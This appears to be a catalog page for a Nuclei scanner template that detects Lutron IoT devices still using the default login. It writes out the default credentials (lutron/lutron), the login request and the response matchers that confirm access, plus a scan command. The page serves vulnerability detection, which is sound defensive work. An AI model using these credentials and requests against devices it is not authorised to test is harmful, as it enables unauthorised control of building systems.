Skip to content

Lutron - Default Account

ID: lutron-default-login

Severity: critical

Author: geeknik

Tags: default-login,lutron,iot

Multiple Lutron devices contain a default login vulnerability. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations.

id: lutron-default-login
info:
name: Lutron - Default Account
author: geeknik
severity: critical
description: Multiple Lutron devices contain a default login vulnerability. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations.
reference:
- https://www.lutron.com
- https://vulners.com/openvas/OPENVAS:1361412562310113206
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cwe-id: CWE-1391
metadata:
max-request: 1
tags: default-login,lutron,iot
http:
- method: GET
path:
- "{{BaseURL}}/login?login={{username}}&password={{password}}"
attack: pitchfork
payloads:
username:
- lutron
password:
- lutron
matchers-condition: and
matchers:
- type: word
part: body
words:
- "LUTRON"
- "DeviceIP"
- "Get Database Info as XML"
condition: and
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200
# digest: 4a0a0047304502202dd442ee82f697b69daf03d3f6ff595ddf375d8a790fb80401e1f612ef8a7318022100da88c9e35737a139f6c842f3bc53776de92f45db5f4e90e40272a6d302131798:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/default-logins/lutron/lutron-default-login.yaml"

View on Github